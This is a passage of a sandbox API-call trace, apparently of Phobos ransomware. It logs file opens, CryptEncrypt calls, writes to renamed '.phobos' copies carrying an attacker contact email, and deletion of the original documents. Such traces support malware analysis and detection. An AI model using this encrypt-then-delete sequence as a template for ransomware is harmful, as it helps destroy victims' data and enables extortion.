halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\sm5nqk2lu kc\\ymvikyj-9s01azpdh.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.307] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.308] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\sM5nqK2Lu kC\\yMVikYj-9s01azpDh.ppt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\sm5nqk2lu kc\\ymvikyj-9s01azpdh.ppt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.308] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0197.308] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.308] ReadFile (in: hFile=0x170, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x632f, lpOverlapped=0x0) returned 1 [0197.312] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x6330, dwBufLen=0x6330 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x6330) returned 1 [0197.312] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x6330, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x6330, lpOverlapped=0x0) returned 1 [0197.313] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa328a8) returned 1 [0197.313] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.313] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0197.313] CryptDestroyKey (hKey=0xa328a8) returned 1 [0197.313] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0197.313] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0197.313] CloseHandle (hObject=0x170) returned 1 [0197.313] CloseHandle (hObject=0x140) returned 1 [0197.313] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\sM5nqK2Lu kC\\yMVikYj-9s01azpDh.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\sm5nqk2lu kc\\ymvikyj-9s01azpdh.ppt")) returned 1 [0197.314] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0197.314] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lNtq1T kmstods.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lntq1t kmstods.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.317] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=47164) returned 1 [0197.317] CloseHandle (hObject=0x140) returned 1 [0197.317] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lNtq1T kmstods.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lntq1t kmstods.xlsx")) returned 0x20 [0197.317] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lNtq1T kmstods.xlsx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lntq1t kmstods.xlsx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lNtq1T kmstods.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lntq1t kmstods.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.317] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.317] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lNtq1T kmstods.xlsx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lntq1t kmstods.xlsx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.318] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0197.318] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.318] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb83c, lpOverlapped=0x0) returned 1 [0197.599] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb840, dwBufLen=0xb840 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb840) returned 1 [0197.599] WriteFile (in: hFile=0x170, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb840, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb840, lpOverlapped=0x0) returned 1 [0197.601] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa328a8) returned 1 [0197.601] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.601] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0197.601] CryptDestroyKey (hKey=0xa328a8) returned 1 [0197.601] WriteFile (in: hFile=0x170, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0197.601] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0197.601] CloseHandle (hObject=0x140) returned 1 [0197.601] CloseHandle (hObject=0x170) returned 1 [0197.601] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lNtq1T kmstods.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lntq1t kmstods.xlsx")) returned 1 [0197.602] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0197.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.604] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=216) returned 1 [0197.604] CloseHandle (hObject=0x170) returned 1 [0197.604] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini")) returned 0x2 [0197.604] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.604] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.604] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.721] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ca8) returned 1 [0197.721] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.721] ReadFile (in: hFile=0x170, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd8, lpOverlapped=0x0) returned 1 [0197.723] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0197.723] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0197.724] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa329a8) returned 1 [0197.724] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.724] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0197.724] CryptDestroyKey (hKey=0xa329a8) returned 1 [0197.724] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0197.724] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0197.724] CloseHandle (hObject=0x170) returned 1 [0197.724] CloseHandle (hObject=0x140) returned 1 [0197.724] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini")) returned 1 [0197.727] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0197.727] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pPD wlVxvT9yO.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ppd wlvxvt9yo.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.728] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=25018) returned 1 [0197.728] CloseHandle (hObject=0x140) returned 1 [0197.728] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pPD wlVxvT9yO.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ppd wlvxvt9yo.docx")) returned 0x20 [0197.728] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pPD wlVxvT9yO.docx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ppd wlvxvt9yo.docx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.728] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pPD wlVxvT9yO.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ppd wlvxvt9yo.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.728] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.728] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.728] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pPD wlVxvT9yO.docx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ppd wlvxvt9yo.docx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.729] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ca8) returned 1 [0197.729] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.729] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x61ba, lpOverlapped=0x0) returned 1 [0197.731] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x61c0, dwBufLen=0x61c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x61c0) returned 1 [0197.731] WriteFile (in: hFile=0x170, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x61c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x61c0, lpOverlapped=0x0) returned 1 [0197.732] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa329a8) returned 1 [0197.732] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.732] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0197.733] CryptDestroyKey (hKey=0xa329a8) returned 1 [0197.733] WriteFile (in: hFile=0x170, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0197.733] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0197.733] CloseHandle (hObject=0x140) returned 1 [0197.733] CloseHandle (hObject=0x170) returned 1 [0197.733] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pPD wlVxvT9yO.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ppd wlvxvt9yo.docx")) returned 1 [0197.734] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0197.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TZT75yw.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tzt75yw.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.735] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=77727) returned 1 [0197.736] CloseHandle (hObject=0x170) returned 1 [0197.736] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TZT75yw.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tzt75yw.pptx")) returned 0x20 [0197.736] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TZT75yw.pptx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tzt75yw.pptx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TZT75yw.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tzt75yw.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.736] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.736] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TZT75yw.pptx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tzt75yw.pptx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.737] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ca8) returned 1 [0197.737] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.737] ReadFile (in: hFile=0x170, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x12f9f, lpOverlapped=0x0) returned 1 [0197.738] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x12fa0, dwBufLen=0x12fa0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x12fa0) returned 1 [0197.739] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x12fa0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x12fa0, lpOverlapped=0x0) returned 1 [0197.742] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa329a8) returned 1 [0197.742] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.742] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0197.742] CryptDestroyKey (hKey=0xa329a8) returned 1 [0197.742] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0197.742] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0197.742] CloseHandle (hObject=0x170) returned 1 [0197.743] CloseHandle (hObject=0x140) returned 1 [0197.743] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TZT75yw.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tzt75yw.pptx")) returned 1 [0197.745] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0197.745] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uFUu.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ufuu.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.746] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=62874) returned 1 [0197.746] CloseHandle (hObject=0x140) returned 1 [0197.746] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uFUu.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ufuu.pptx")) returned 0x20 [0197.746] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uFUu.pptx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ufuu.pptx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.746] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uFUu.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ufuu.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.746] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.746] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.746] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uFUu.pptx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ufuu.pptx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.747] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ca8) returned 1 [0197.747] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.747] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xf59a, lpOverlapped=0x0) returned 1 [0197.749] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf5a0, dwBufLen=0xf5a0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf5a0) returned 1 [0197.749] WriteFile (in: hFile=0x170, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf5a0, 